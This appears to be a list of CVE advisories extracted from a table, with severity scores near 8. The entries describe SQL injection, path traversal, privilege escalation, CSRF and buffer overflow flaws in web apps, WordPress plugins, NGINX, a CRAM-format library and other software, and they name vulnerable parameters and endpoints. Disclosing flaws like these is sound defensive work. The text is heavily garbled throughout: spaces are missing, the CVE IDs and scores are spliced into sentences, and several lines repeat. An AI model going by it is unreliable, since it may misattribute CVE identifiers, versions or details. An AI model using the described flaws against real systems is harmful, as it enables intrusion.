SQLqueriesbyinjectingmaliciouscodethroughtheIMGparameter.AttackerscansendGETrequeststo More2019- 8.2 pdfstream.php,imagestream.php,oranyfilestream.phpwithcraftedSQLpayloadsintheIMGparametertoextract Details25580 sensitivedatabaseinformationincludingversionanddatabasenames. SimplePressCMS1.0.7containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoexecuteCVE- arbitrarySQLqueriesbyinjectingmaliciouscodethroughthe'p'and's'parameters.AttackerscansendGET More2019- 8.2 requestswithcraftedSQLpayloadstoextractsensitivedatabaseinformationincludingusernames,database Details25575 names,andversiondetails. TheKiviCare–Clinic&PatientManagementSystem(EHR)pluginforWordPressisvulnerabletoPrivilegeCVE- Escalationduetomissingauthorizationonthe/wp-json/kivicare/v1/setup-wizard/clinicRESTAPIendpointinall More2026- 8.2 versionsupto,andincluding,4.1.2.Thismakesitpossibleforunauthenticatedattackerstocreateanewclinic Details2992 andaWordPressuserwithclinicadminprivileges. HeimdallisacloudnativeIdentityAwareProxyandAccessControlDecisionservice.WhenusingHeimdallin envoygRPCdecisionAPImodewithversions0.7.0-alphathrough0.17.10,wrongencodingofthequeryURLstring allowsruleswithnon-wildcardpathexpressionstobebypassed.EnvoysplitstherequestedURLintoparts,and sendsthepartsindividuallytoHeimdall.AlthoughqueryandpatharepresentintheAPI,thequeryfieldis CVE- documentedtobealwaysemptyandtheURLqueryisincludedinthepathfield.Theimplementationusesgo'surl More2026- librarytoreconstructtheurlwhichautomaticallyencodesspecialcharactersinthepath.Asaconsequence,a 8.2 Details32811 parameterlike/mypath?foo=bartoPathisescapedinto/mypath%3Ffoo=bar.Subsequently,arulematching /mypathnolongermatchesandisbypassed.TheissuecanonlyleadtounintendedaccessifHeimdallis configuredwithan"allowall"defaultrule.Sincev0.16.0,Heimdallenforcessecuredefaultsandrefusestostart withsuchaconfigurationunlessthisenforcementisexplicitlydisabled,e.g.via--insecure-skip-secure-default-rule- enforcementorthebroader--insecureflag.Thisissuehasbeenfixedinversion0.17.11. FileRiseisaself-hostedwebfilemanager/WebDAVserver.Inversionspriorto3.9.0,ahardcodeddefault encryptionkey(defaultpleasechangethiskey)isusedforallcryptographicoperations—HMACtoken CVE- generation,AESconfigencryption,andsessiontokens—allowinganyunauthenticatedattackertoforgeupload More2026- tokensforarbitraryfileuploadtosharedfolders,andtodecryptadminconfigurationsecretsincludingOIDCclient 8.2 Details33072 secretsandSMTPpasswords.FileRiseusesasinglekey(PERSISTENTTOKENSKEY)forallcryptooperations.The defaultvaluedefaultpleasechangethiskeyishardcodedintwoplacesandusedunlessthedeployerexplicitly overridestheenvironmentvariable.Thisissueisfixedinversion3.9.0. MatrimonyWebsiteScriptM-PluscontainsmultipleSQLinjectionvulnerabilitiesthatallowunauthenticated CVE- attackerstomanipulatedatabasequeriesbyinjectingSQLcodethroughvariousPOSTparameters.Attackerscan More2019- injectmaliciousSQLpayloadsintoparametersliketxtGender,religion,Fage,andcboCountryacross 8.2 Details25639 simplesearchresults.php,advsearchresults.php,specialcaseresults.php,locationalresults.php,and registration2.phptoextractsensitivedatabaseinformationorexecutearbitrarySQLcommands. OpenClawversionspriorto2026.2.19containapathtraversalvulnerabilityintheFeishumediadownloadflowCVE- whereuntrustedmediakeysareinterpolateddirectlyintotemporaryfilepathsinextensions/feishu/src/media.ts. More2026- 8.2 AnattackerwhocancontrolFeishumediakeyvaluesreturnedtotheclientcanusetraversalsegmentstoescape Details22171 os.tmpdir()andwritearbitraryfileswithintheOpenClawprocesspermissions. CVE- BufferOverflowvulnerabilityingiflibv.5.2.2allowsaremoteattackertocauseadenialofserviceviathe More2026- 8.2 EGifGCBToExtensionoverwritinganexistingGraphicControlExtensionblockwithoutvalidatingitsallocatedsize. Details26740 WhenapluginisinstalledusingtheArturiaSoftwareCenter(MacOS),italsoinstallsanuninstall.shbashscriptinaCVE- rootownedpath.Thisscriptiswrittentodiskwiththefilepermissions777,meaningitiswritablebyanyuser. More2026- 8.2 WhenuninstallingapluginviatheArturiaSoftwareCenterthePrivilegedHelpergetsinstructedtoexecutethis Details24063 script.Whenthebashscriptismanipulatedbyanattackerthisscenariowillleadtoprivilegeescalation. InoutArticleBaseCMScontainsSQLinjectionvulnerabilitiesthatallowunauthenticatedattackerstomanipulateCVE- databasequeriesthroughthe'p'and'u'parameters.AttackerscaninjectSQLcodeusingXOR-basedpayloadsin More2019- 8.2 GETrequeststoportalLogin.phptoextractsensitivedatabaseinformationorcausedenialofservicethroughtime- Details25640 basedattacks. BootstrapyCMScontainsmultipleSQLinjectionvulnerabilitiesthatallowunauthenticatedattackerstoexecute CVE- arbitrarySQLqueriesbyinjectingmaliciouscodethroughPOSTparameters.AttackerscaninjectSQLpayloads More intothethread_idparameterofforum-thread.php,thesubjectparameterofcontact-submit.php,thepost-id 8.2 Details 25642 parameterofpost-new-submit.php,andthethread-idparametertoextractsensitivedatabaseinformationor 25642 parameterofpost-new-submit.php,andthethread-idparametertoextractsensitivedatabaseinformationor causedenialofservice. i-doitCMDB1.12containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoexecutearbitraryCVE- SQLqueriesbyinjectingmaliciouscodethroughtheobjGroupIDparameter.AttackerscansendGETrequestswith More 8.2 craftedSQLpayloadsintheobjGroupIDparametertoextractsensitivedatabaseinformationincludingusernames, Details25581 databasenames,andversiondetails. bareboxisabootloader.Inbareboxfromversion2016.03.0tobeforeversion2025.09.3andfromversion 2025.10.0tobeforeversion2026.03.1,whencreatingaFIT,mkimage(1)setsthehashed-nodespropertyoftheCVE- FITsignaturenodetolistwhichnodesoftheFITwerehashedaspartofthesigningprocessasthesewillneedto More2026- 8.2 beverifiedlateronbythebootloader.However,hashed-nodesitselfisnotpartofthehashandcanthereforebe Details33243 modifiedbyanattackertotrickthebootloaderintobootingdifferentimagesthanthosethathavebeenverified. Thisissuehasbeenpatchedinbareboxversions2025.09.3and2026.03.1.

DNAsequencealignmentdata.Inthecram_decode_slice()functioncalledwhilereadingCRAMrecords, CVE-validationofthereferenceidfieldoccurredtoolate,allowingtwooutofboundsreadstooccurbeforetheinvalid More2026-datawasdetected.Thebugdoesallowtwovaluestobeleakedtothecaller,howeverasthefunctionreportsan 8.2 Details31965erroritmaybedifficulttoexploitthem.Itisalsopossiblethattheprogramwillcrashduetotryingtoaccess invalidmemory.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthis issue. NetartmediaVlogSystemcontainsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoCVE-manipulatedatabasequeriesbyinjectingSQLcodethroughtheemailparameter.AttackerscansendPOST More2019- 8.2requeststoindex.phpwithmaliciousemailvaluesintheforgottenpasswordmoduletoextractsensitivedatabase Details25641information. SpringBootapplicationswithActuatorcanbevulnerabletoan"AuthenticationBypass"vulnerabilitywhenan CVE-applicationendpointthatrequiresauthenticationisdeclaredunderaspecificpath,alreadyconfiguredforaHealth More2026-Groupadditionalpath.ThisissueaffectsSpringBoot:from4.0before4.0.3,from3.5before3.5.11,from3.4 8.2 Details22731before3.4.15.ThisCVEissimilarbutnotequivalenttoCVE-2026-22733,astheconditionsforexploitand vulnerableversionsaredifferent. NGINXOpenSourceandNGINXPlushaveavulnerabilityinthengxhttpdavmodulemodulethatmightallowan attackertotriggerabufferoverflowtotheNGINXworkerprocess;thisvulnerabilitymayresultinterminationof CVE-theNGINXworkerprocessormodificationofsourceordestinationfilenamesoutsidethedocumentroot.This More2026-issueaffectsNGINXOpenSourceandNGINXPluswhentheconfigurationfileusesDAVmoduleMOVEorCOPY 8.2 Details27654methods,prefixlocation(nonregularexpressionlocationconfiguration),andaliasdirectives.Theintegrityimpact isconstrainedbecausetheNGINXworkerprocessuserhaslowprivilegesanddoesnothaveaccesstotheentire system.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS)arenotevaluated. CVE- More2026- 8.1vulnerabilityinOvathemeTripgoallowsPHPLocalFileInclusion.ThisissueaffectsTripgo:fromn/abefore1.5.6. Details27093 CVE- More2026-versionsonthe2.xseriesuptoandincluding2.41.0,animproperauthorizationissueintheMyPageprofile 8.1 Details32300updatefeaturemayallowmodificationofarbitraryuserinformation.Versions1.41.1and2.41.1containapatch. FileRiseisaself-hostedwebfilemanager/WebDAVserver.Fromversion1.0.1tobeforeversion3.10.0,the CVE-resumableIdentifierparameterintheResumable.jschunkeduploadhandler(UploadModel::handleUpload())is More2026-concatenateddirectlyintofilesystempathswithoutanysanitization.Anauthenticateduserwithupload 8.1 Details33329permissioncanexploitthistowritefilestoarbitrarydirectoriesontheserver,deletearbitrarydirectoriesviathe post-assemblycleanup,andprobefile/directoryexistence.Thisissuehasbeenpatchedinversion3.10.0. CVE-DeserializationofUntrustedDatavulnerabilityinBuddhaThemesColorFolio-FreelanceDesignerWordPress More2026-ThemeallowsObjectInjection.ThisissueaffectsColorFolio-FreelanceDesignerWordPressTheme:fromn/a 8.1 Details27096through1.3. AvulnerabilitywasidentifiedinYiTechnologyYIHomeCamera22.1.120171024151200.Thisimpactsan CVE-unknownfunctionofthefilehome/web/ipcofthecomponentHTTPFirmwareUpdateHandler.Themanipulation More2026-leadstoimproperverificationofcryptographicsignature.Theattackispossibletobecarriedoutremotely.The 8.1 Details4478complexityofanattackisratherhigh.Theexploitabilityissaidtobedifficult.Theexploitispubliclyavailableand mightbeused.Thevendorwascontactedearlyaboutthisdisclosurebutdidnotrespondinanyway. CVE-AuthenticationBypassUsinganAlternatePathorChannelvulnerabilityinThemepasteAdminSafetyGuardallows More 2026- 8.1PasswordRecoveryExploitation.ThisissueaffectsAdminSafetyGuard:fromn/athrough1.2.6. Details 25471 WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theremindMe.json.php endpointpasses`$REQUEST['livescheduleid']throughmultiplefunctionswithoutsanitizationuntilitreaches CVE-Schedulercommands::getAllActiveOrToRepeat(),whichdirectlyconcatenatesitintoaSQLLIKEclause. MoreAlthoughintermediatefunctions(newLiveschedule(),getUsers_idOrCompany())applyintval()internally, 8.1 33651theydosoonlocalcopieswithinObjectYPT::getFromDb()`,leavingtheoriginaltaintedvariableunchanged.Any Details authenticatedusercanperformtime-basedblindSQLinjectiontoextractarbitrarydatabasecontents.Commit authenticatedusercanperformtime-basedblindSQLinjectiontoextractarbitrarydatabasecontents.Commit 75d45780728294ededa1e3f842f95295d3e7d144containsapatch.

CVE- to8.0.0.2,themoduleACLfunctionAclMain::zhAclCheck()onlychecksforthepresenceofany"allow"(useror More group).Itneverchecksforexplicit"deny"(allowed=0).Asaresult,administratorscannotrevokeaccessbysetting 8.1 Details33302 auserorgroupto"deny";iftheuserisinagroupthathas"allow,"accessisgrantedregardlessofexplicitdenies. Version8.0.0.2fixestheissue.

CVE- to8.0.0.2,userswiththeNotes-myencountersrolecanfillEyeExamformsinpatientencounters.Theanswers More2026- totheformcanbeprintedoutinPDFform.AnarbitraryfilereadvulnerabilitywasidentifiedinthePDFcreation 8.1 Details33301 functionwheretheformanswersareparsedasunescapedHTML,allowinganattackertoincludearbitraryimage filesfromtheserverinthegeneratedPDF.Version8.0.0.2fixestheissue.

sanitizeFFmpegCommand()functioninplugin/API/standAlone/functions.phpisdesignedtopreventOS CVE-commandinjectioninffmpegcommandsbystrippingdangerousshellmetacharacters(&&,;,|,`,<, More2026->).However,itfailstostrip$()(bashcommandsubstitutionsyntax).Sincethesanitizedcommandis 8.1 Details33482executedinsideadouble-quotedsh-ccontextinexecAsync(),anattackerwhocancraftavalidencrypted payloadcanachievearbitrarycommandexecutiononthestandaloneencoderserver.Commit 25c8ab90269e3a01fb4cf205b40a373487f022e1containsapatch. CVE- More2026-vulnerabilityinThemeREXMelaniaallowsPHPLocalFileInclusion.ThisissueaffectsMelania:fromn/athrough 8.1 Details223242.5.0. CVE-PJSIPisafreeandopensourcemultimediacommunicationlibrarywritteninC.Versions2.16andbelowcontaina More2026-heapuse-after-freevulnerabilityintheICEsessionthatoccurswhenthereareraceconditionsbetweensession 8.1 Details32942destructionandthecallbacks.Thisissuehasbeenfixedinversion2.17. DataEaseisanopensourcedatavisualizationanalysistool.Versions2.10.19andbelowhaveinconsistentLocale handlingbetweentheJDBCURLvalidationlogicandtheH2JDBCengine'sinternalparsing.DataEaseuses String.toUpperCase()withoutspecifyinganexplicitLocale,causingitssecuritycheckstorelyontheJVM'sdefault CVE-runtimelocale,whileH2JDBCalwaysnormalizesURLsusingLocale.ENGLISH.InTurkishlocaleenvironments More2026-(tr_TR),Javaconvertsthelowercaseletteritoİ(dottedcapitalI)insteadofthestandardI,soamalicious 8.1 Details32939parameterlikeiNITbecomesİNITinDataEase'sfilter(bypassingitsblacklist)whileH2stillcorrectlyinterpretsitas INIT.ThisdiscrepancyallowsattackerstosmuggledangerousJDBCparameterspastDataEase'ssecurity validation,andtheissuehasbeenconfirmedasexploitableinrealDataEasedeploymentscenariosrunningunder affectedregionalsettings.Theissuehasbeenfixedinversion2.10.20.

plugin/Permissions/setPermission.json.phpendpointacceptsGETparametersforastate-changingoperationthatCVE-modifiesusergrouppermissions.TheendpointhasnoCSRFtokenvalidation,andtheapplicationexplicitlysets More2026- 8.1session.cookie_samesite=Noneonsessioncookies.Thisallowsanunauthenticatedattackertocraftapagewith Details33649`

`tagsthat,whenvisitedbyanadmin,silentlygrantarbitrarypermissionstotheattacker'susergroup— escalatingtheattackertonear-adminaccess.Asoftimeofpublication,noknownpatchedversionsareavailable.

researchanddevelopmentinNaturalLanguageProcessing.Inversions3.9.3andprior,theNLTKdownloaderdoesCVE-notvalidatethesubdirandidattributeswhenprocessingremoteXMLindexfiles.Attackerscancontrola More2026- 8.1remoteXMLindexservertoprovidemaliciousvaluescontainingpathtraversalsequences(suchas../),which Details33236canleadtoarbitrarydirectorycreation,arbitraryfilecreation,andarbitraryfileoverwrite.Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8apatchestheissue. Daguisaworkflowenginewithabuilt-inWebuserinterface.Fromversion2.0.0tobeforeversion2.3.1,thefixfor CVE-CVE-2026-27598addedValidateDAGNametoCreateNewDAGandrewrotegenerateFilePathtousefilepath.Base. More2026-ThispatchedtheCREATEpath.TheremainingAPIendpoints-GET,DELETE,RENAME,EXECUTE-allpassthe 8.1 Details33344{fileName}URLpathparametertolocateDAGwithoutcallingValidateDAGName.%2F-encodedforwardslashesin the{fileName}segmenttraverseoutsidetheDAGsdirectory.Thisissuehasbeenpatchedinversion2.3.1. MuraCMSthrough10.1.10containsaCSRFvulnerabilitythatallowsattackerstopermanentlydestroyalldeleted contentstoredinthetrashsystemthroughasimpleCSRFattack.ThevulnerablecTrash.emptyfunctionlacks CSRFtokenvalidation,enablingmaliciouswebsitestoforgerequeststhatirreversiblydeletealltrashedcontentCVE- Morewhenanauthenticatedadministratorvisitsacratedwebpage.SuccessfulexploitationoftheCSRFvulnerability2025- 8.1 DetailsresultsinpotentiallycatastrophicdatalosswithintheMuraCMSsystem.Whenanauthenticatedadministrator55046 visitsamaliciouspagecontainingtheCSRFexploit,theirbrowserautomaticallysubmitsahiddenformthat permanentlyemptiestheentiretrashsystemwithoutanyvalidation,confirmationdialog,oruserconsent. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,thedeleteDumpparameterin CVE-plugin/CloneSite/cloneServer.json.phpispasseddirectlytounlink()withoutanypathsanitization.Anattacker Morewithvalidclonecredentialscanusepathtraversalsequences(e.g.,../../)todeletearbitraryfilesontheserver, 8.1 Details33293includingcriticalapplicationfilessuchasconfiguration.php,causingcompletedenialofserviceorenabling furtherattacksbyremovingsecurity-criticalfiles.Version26.0fixestheissue.

WWBNAVideoisanopensourcevideoplatform.Inversions25.0andbelow,theofficialDockerdeploymentfiles (docker-compose.yml,env.example)shipwiththeadminpasswordsetto"password",whichisautomaticallyused toseedtheadminaccountduringinstallation,meaninganyinstancedeployedwithoutoverriding SYSTEMADMINPASSWORDisimmediatelyvulnerabletotrivialadministrativetakeover.NocompensatingCVE-controlsexist:thereisnoforcedpasswordchangeonfirstlogin,nocomplexityvalidation,nodefault-password More 8.1detection,andthepasswordishashedwithweakMD5.Fulladminaccessenablesuserdataexposure,content Details33037manipulation,andpotentialremotecodeexecutionviafileuploadsandpluginmanagement.Thesameinsecure- defaultpatternextendstodatabasecredentials(avideo/avideo),compoundingtherisk.Exploitationdependson operatorsfailingtochangethedefault,aconditionlikelymetinquick-start,demo,andautomateddeployments. Thisissuehasbeenfixedinversion26.0. WWBNAVideoisanopensourcevideoplatform.Inversions25.0andbelow,/objects/phpsessionid.json.phpCVE-exposesthecurrentPHPsessionIDtoanyunauthenticatedrequest.TheallowOrigin()functionreflectsanyOrigin More2026- 8.1headerbackinAccess-Control-Allow-OriginwithAccess-Control-Allow-Credentials:true,enablingcross-origin Details33043sessiontheftandfullaccounttakeover.Thisissuehasbeenfixedinversion26.0. FileBrowserisafilemanaginginterfaceforuploading,deleting,previewing,renaming,andeditingfileswithina specifieddirectory.Inversions2.61.2andbelow,theTUSresumableuploadhandlerparsestheUpload-Length headerasasigned64-bitintegerwithoutvalidatingthatthevalueisnon-negative,allowinganauthenticateduser tosupplyanegativevaluethatinstantlysatisfiestheuploadcompletionconditionuponthefirstPATCHrequest. Thiscausestheservertofireafter_uploadexechookswithemptyorpartialfiles,enablinganattackertoCVE-repeatedlytriggeranyconfiguredhookwitharbitraryfilenamesandzerobyteswritten.Theimpactrangesfrom More2026- 8.1DoSthroughexpensiveprocessinghooks,tocommandinjectionamplificationwhencombinedwithmalicious Details32759filenames,toabuseofupload-drivenworkflowslikeS3ingestionordatabaseinserts.Evenwithoutexechooks enabled,thenegativeUpload-Lengthcreatesinconsistentcacheentrieswherefilesaremarkedcompletebut containnodata.AlldeploymentsusingtheTUSuploadendpoint(/api/tus)areaffected,withtheenableExecflag escalatingtheimpactfromcacheinconsistencytoremotecommandexecution.Atthetimeofpublication,no patchormitigationwasavailabletoaddressthisissue. Checkmateisanopen-source,self-hostedtooldesignedtotrackandmonitorserverhardware,uptime,response times,andincidentsinreal-timewithbeautifulvisualizations.Inversionsfrom3.5.1andprior,amassassignmentCVE-vulnerabilityinCheckmate'suserprofileupdateendpointallowsanyauthenticatedusertoescalatetheir More2026- 8.1privilegestosuperadmin,bypassingallrole-basedaccesscontrols.Anattackercanmodifytheiruserroletogain Details31836completeadministrativeaccesstotheapplication,includingtheabilitytoviewallusers,modifycritical configurations,andaccesssensitivesystemdata.Attimeofpublication,therearenopubliclyavailablepatches. tar-rsisatararchivereading/writinglibraryforRust.Versions0.4.44andbelowhaveconditionallogicthatskips thePAXsizeheaderincaseswherethebaseheadersizeisnonzero.AspartofCVE-2025-62518,theastral-tokio- tarprojectwaschangedtocorrectlyhonorPAXsizeheadersinthecasewhereitwasdifferentfromthebaseCVE-header.Thisisalmosttheinverseoftheastral-tokio-tarissue.Anydiscrepancyinhowtarparsershonorfilesize More2026- 8.1canbeusedtocreatearchivesthatappeardifferentlywhenunpackedbydifferentarchivers.Inthiscase,thetar- Details33055rs(Rusttar)crateisanoutlierincheckingfortheheadersize-othertarparsers(includinge.g.Goarchive/tar) unconditionallyusethePAXsizeoverride.Thiscanaffectanythingthatusesthetarcratetoparsearchivesand expectstohaveaconsistentviewwithotherparsers.Thisissuehasbeenfixedinversion0.4.45. WWBNAVideoisanopensourcevideoplatform.Versions25.0andbelowarevulnerabletounauthenticated applicationtakeoverthroughtheinstall/checkConfiguration.phpendpoint.install/checkConfiguration.phpperformsCVE-fullapplicationinitialization:databasesetup,adminaccountcreation,andconfigurationfilewrite,allfroman More2026- 8.1unauthenticatedPOSTinput.Theonlyguardischeckingwhethervideos/configuration.phpalreadyexists.On Details33038uninitializeddeployments,anyremoteattackercancompletetheinstallationwithattacker-controlledcredentials andanattacker-controlleddatabase,gainingfulladministrativeaccess.Thisissuehasbeenfixedinversion26.0. CVE-Priortoversions7.15.1and8.9.3,theSuiteCRMRESTAPIV8hasmissingACL(AccessControlList)checkson More2026- 8.1severalendpoints,allowingauthenticateduserstoaccessandmanipulatedatatheyshouldnothavepermission Details29189tointeractwith.Versions7.15.1and8.9.3patchtheissue.

DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.Whenreadingdata encodedusingtheBYTE_ARRAY_LENmethod,thecram_byte_array_len_decode()failedtovalidatethatthe amountofdatabeingunpackedmatchedthesizeoftheoutputbufferwhereitwastobestored.DependingonCVE-thedataseriesbeingread,thiscouldresulteitherinaheaporastackoverflowwithattacker-controlledbytes. More2026- 8.1Dependingonthedatastreamthiscouldresulteitherinaheapbufferoverfloworastackoverflow.Ifauser Details31971opensafilecraftedtoexploitthisissueitcouldleadtotheprogramcrashing,overwritingofdatastructureson theheaporstackinwaysnotexpectedbytheprogram,orchangingthecontrolflowoftheprogram.Itmaybe possibletousethistoobtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthis issue.Thereisnoworkaroundforthisissue. Vikunjaisanopen-sourceself-hostedtaskmanagementplatform.Priortoversion2.2.0,aflawinVikunja’s passwordresetlogicallowsdisableduserstoregainaccesstotheiraccounts.TheResetPassword()functionsetsCVE-theuser’sstatustoStatusActiveafterasuccessfulpasswordresetwithoutverifyingwhethertheaccountwas More 8.1previouslydisabled.Byrequestingaresettokenthrough/api/v1/user/password/tokenandcompletingthereset Details33316 via/api/v1/user/password/reset,adisabledusercanreactivatetheiraccountandbypassadministrator-imposed accountdisablement.Version2.2.0patchestheissue. accountdisablement.Version2.2.0patchestheissue. Stirling-PDFisalocallyhostedwebapplicationthatperformsvariousoperationsonPDFfiles.Inversionspriorto CVE-2.5.2,the/api/v1/convert/markdown/pdfendpointextractsuser-suppliedZIPentrieswithoutpathchecks.Any Moreauthenticatedusercanwritefilesoutsidetheintendedtemporaryworkingdirectory,leadingtoarbitraryfilewrite 8.1 Details27625withtheprivilegesoftheStirling-PDFprocessuser(stirlingpdfuser).Thiscanoverwritewritablefilesand compromisedataintegrity,withfurtherimpactdependingonwritablepaths.Theissuewasfixedinversion2.5.2. Vikunjaisanopen-sourceself-hostedtaskmanagementplatform.Priortoversion2.2.1, TaskAttachment.ReadOne()queriesattachmentsbyIDonly(WHEREid=?),ignoringthetaskIDfromtheURL CVE-path.ThepermissioncheckinCanRead()validatesaccesstothetaskspecifiedintheURL,butReadOne() More2026-loadsadifferentattachmentthatmaybelongtoataskinanotherproject.Thisallowsanyauthenticateduserto 8.1 Details33678downloadordeleteanyattachmentinthesystembyprovidingtheirownaccessibletaskIDwithatarget attachmentID.AttachmentIDsaresequentialintegers,makingenumerationtrivial.Version2.2.1patchesthe issue.

DNAsequencealignmentdata.Asonemethodofremovingredundantdata,CRAMusesreference-based compressionsothatinsteadofstoringthefullsequenceforeachalignmentrecorditstoresalocationinan externalreferencesequencealongwithalistofdifferencestothereferenceatthatlocationasasequenceofCVE-"features".Whendecodingthesefeatures,anout-by-oneerrorinatestforCRAMfeaturesthatappearbeyondthe More2026- 8.1extentoftheCRAMrecordsequencecouldresultinaninvalidwriteofoneattacker-controlledbytebeyondthe Details31963endofaheapbuffer.Exploitingthisbugcausesaheapbufferoverflow.Ifauseropensafilecraftedtoexploitthis issue,itcouldleadtotheprogramcrashing,oroverwritingofdataandheapstructuresinwaysnotexpectedby theprogram.Itmaybepossibletousethistoobtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1 includefixesforthisissue.Thereisnoworkaroundforthisissue. ApostropheCMSisanopen-sourcecontentmanagementframework.Priortoversion4.28.0,thebearertoken authenticationmiddlewarein@apostrophecms/express/index.js(lines386-389)containsanincorrectMongoDBCVE-querythatallowsincompletelogintokens—wherethepasswordwasverifiedbutTOTP/MFArequirementswere More2026- 8.1NOT—tobeusedasfullyauthenticatedbearertokens.Thiscompletelybypassesmulti-factorauthenticationfor Details32730anyApostropheCMSdeploymentusing@apostrophecms/login-totporanycustomafterPasswordVerifiedlogin requirement.Version4.28.0fixestheissue. pyLoadisafreeandopen-sourcedownloadmanagerwritteninPython.Versionsbefore0.5.0b3.dev97are CVE-vulnerabletopathtraversalduringpasswordverificationofcertainencrypted7zarchives(encryptedfileswith More2026-non-encryptedheaders),causingarbitraryfiledeletionoutsideoftheextractiondirectory.Duringpassword 8.1 Details32808verification,pyLoadderivesanarchiveentrynamefrom7zlistingoutputandtreatsitasafilesystempathwithout constrainingittotheextractiondirectory.Thisissuehasbeenfixedinversion0.5.0b3.dev97. CVE-ImpropercertificatevalidationinthePAMpropagationWinRMconnectionsallowsanetworkattackertoperforma More2026- 8.1man-in-the-middleattackviadisabledTLScertificateverification. Details4434 AflawwasfoundinKeycloak.AremoteattackercouldbypasssecuritycontrolsbysendingavalidSAMLresponseCVE-fromanexternalIdentityProvider(IdP)totheKeycloakSAMLendpointforIdP-initiatedbrokerlogins.Thisallows More2026- 8.1theattackertocompletebrokerloginsevenwhentheSAMLIdentityProviderisdisabled,leadingtounauthorized Details2603authentication.

DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.FortheVARINTand CONSTencodings,incompletevalidationofthecontextinwhichtheencodingswereusedcouldresultinupto eightbytesbeingwrittenbeyondtheendofaheapallocation,oruptoeightbytesbeingwrittentothelocationofCVE-aonebytevariableonthestack,possiblycausingthevaluestoadjacentvariablestochangeunexpectedly. More2026- 8.1Dependingonthedatastreamthiscouldresulteitherinaheapbufferoverfloworastackoverflow.Ifauser Details31968opensafilecraftedtoexploitthisissueitcouldleadtotheprogramcrashing,overwritingofdatastructureson theheaporstackinwaysnotexpectedbytheprogram,orchangingthecontrolflowoftheprogram.Itmaybe possibletousethistoobtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthis issue.Thereisnoworkaroundforthisissue.

DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.Whenreadingdata encodedusingtheBYTE_ARRAY_STOPmethod,anout-by-oneerrorinthe CVE-cram_byte_array_stop_decode_char()functioncheckforafulloutputbuffercouldresultinasingleattacker- More2026-controlledbytebeingwrittenbeyondtheendofaheapallocation.Exploitingthisbugcausesaheapbuffer 8.1 Details31969overflow.Ifauseropensafilecraftedtoexploitthisissue,itcouldleadtotheprogramcrashing,oroverwritingof dataandheapstructuresinwaysnotexpectedbytheprogram.Itmaybepossibletousethistoobtainarbitrary codeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthis issue. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priortoversion4.5.2,inCentralBrowsermode, GlancesstoresboththeZeroconf-advertisedservernameandthediscoveredIPaddressfordynamicservers,but laterbuildsconnectionURIsfromtheuntrustedadvertisednameinsteadofthediscoveredIP.Whenadynamic serverreportsitselfasprotected,Glancesalsousesthatsameuntrustednameasthelookupkeyforsaved MoreCVE- 8.1passwordsandtheglobal[passwords]defaultcredential.Anattackeronthesamelocalnetworkcanadvertisea Details passwordsandtheglobal[passwords]defaultcredential.Anattackeronthesamelocalnetworkcanadvertisea Details fakeGlancesserviceoverZeroconfandcausethebrowsertoautomaticallysendareusableGlances32634 authenticationsecrettoanattacker-controlledhost.ThisaffectsthebackgroundpollingpathandtheREST/WebUI click-throughpathinCentralBrowsermode.Version4.5.2fixestheissue. jsPDFisalibrarytogeneratePDFsinJavaScript.Priortoversion4.2.1,usercontrolofargumentsofthe createAnnotationmethodallowsuserstoinjectarbitraryPDFobjects,suchasJavaScriptactions.IfgiventheCVE-possibilitytopassunsanitizedinputtothefollowingmethod,ausercaninjectarbitraryPDFobjects,suchas More2026- 8.1JavaScriptactions,whichmighttriggerwhenthePDFisopenedorinteractedwiththecreateAnnotation:color Details31898parameter.ThevulnerabilityhasbeenfixedinjsPDF@4.2.1.Asaworkaround,sanitizeuserinputbeforepassingit tothevulnerableAPImembers. mcp-memory-serviceisanopen-sourcememorybackendformulti-agentsystems.Priortoversion10.25.1,when theHTTPserverisenabled(MCPHTTPENABLED=true),theapplicationconfiguresFastAPI'sCORSMiddlewarewith CVE-alloworigins=['*'],allowcredentials=True,allowmethods=["*"],andallowheaders=[""].ThewildcardAccess- More2026-Control-Allow-Origin:headerpermitsanywebsitetoreadAPIresponsescross-origin.Whencombinedwith 8.1 Details33010anonymousaccess(MCPALLOWANONYMOUS_ACCESS=true)-thesimplestwaytogettheHTTPdashboard workingwithoutOAuth-nocredentialsareneeded,soanymaliciouswebsitecansilentlyread,modify,anddelete allstoredmemories.Thisissuehasbeenpatchedinversion10.25.1.

Priortoversions7.15.1and8.9.3,whencreatingoreditingareport(AORReportsmodule),the`fieldfunctionCVE-parameterfromPOSTdataissaveddirectlyintotheaorfieldstablewithoutanyvalidation.Later,whenthe More2026-reportisexecuted/viewed,thisvalueisconcatenateddirectlyintoaSQLSELECTquerywithoutsanitization, 8.1 Details29096enablingsecond-orderSQLinjection.AnyauthenticateduserwithReportsaccesscanextractarbitrarydatabase contents(passwordhashes,APItokens,configvalues).OnMySQLwithFILEprivilege,thiscouldleadtoRCEvia SELECTINTOOUTFILE.Versions7.15.1and8.9.3patchtheissue. TheInvelityProductFeedspluginforWordPressisvulnerabletoarbitraryfiledeletionviapathtraversalinall CVE-versionsupto,andincluding,1.2.6.Thisisduetomissingvalidationandsanitizationinthe More2025-'createManageFeedPage'function.Thismakesitpossibleforauthenticatedadministrator-levelattackerstodelete 8.1 Details14037arbitraryfilesontheserverviaspeciallycraftedrequeststhatincludepathtraversalsequences,grantedtheycan trickanadminintoclickingamaliciouslink. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priortoversion4.5.2,theGlancesRESTAPIweb 